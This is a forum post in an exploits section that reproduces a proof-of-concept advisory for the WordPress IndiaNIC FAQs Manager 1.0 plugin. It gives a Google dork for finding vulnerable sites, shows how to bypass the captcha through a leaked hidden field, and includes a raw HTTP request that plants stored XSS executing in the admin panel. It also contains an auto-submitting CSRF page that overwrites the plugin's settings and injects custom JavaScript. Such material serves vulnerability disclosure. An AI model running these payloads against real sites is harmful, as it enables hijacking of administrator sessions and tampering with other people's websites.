Jump to content
Gonzalez

WordPress IndiaNIC FAQs Manager Plugin 1.0 - Multiple Vulnerabilities

By Gonzalez, in Exploituri

Recommended Posts

Gonzalez Newbie

Gonzalez

Posted
Posted 
<html>
<!--
# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)


##############
# Description:
##############
# IndiaNIC FAQ Settings Page is vulnerable for CSRF.
# The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert <script>alert(1)</script> in question parameter.
# The Captcha value can be read from captcha parameter (hidden field)
#



###################################
#### Part of Ask Question form ####
###################################
<form action="" method="POST" name="iNICfaqsAskForm_1">
<input type="hidden" value="1" name="group_id">
<input type="hidden" value="1" name="from_user">
<input type="hidden" value="inic_faq_questions" name="action">
<input type="hidden" value="5540" name="captcha">   <=================== We don't need the captcha Image when we have this xD


####################################################################
#### Request from Ask Question area (XSS in question parameter) ####
####################################################################
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9001/wordpress/?p=11
Content-Length: 143
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560

# When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute.



#######################################################################
-->
    <title>
       #####################################################
       ############## IndiaNIC FAQ 1.0 CSRF ################
       #####################################################
    </title>
<body>

    <!-- replace "127.0.0.1:9001/wordpress" -->
    <form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="inic_faq_settings" />
    <input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" />
    <input type="hidden" name="capture_email" value="1" />
    <input type="hidden" name="notify_when_answered" value="1" />
    <input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" />
    <input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" />
    <input type="hidden" name="custom_js" value="alert(1234)" />
    </form>
    <script>document.forms[0].submit();</script>

</body>
</html>

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...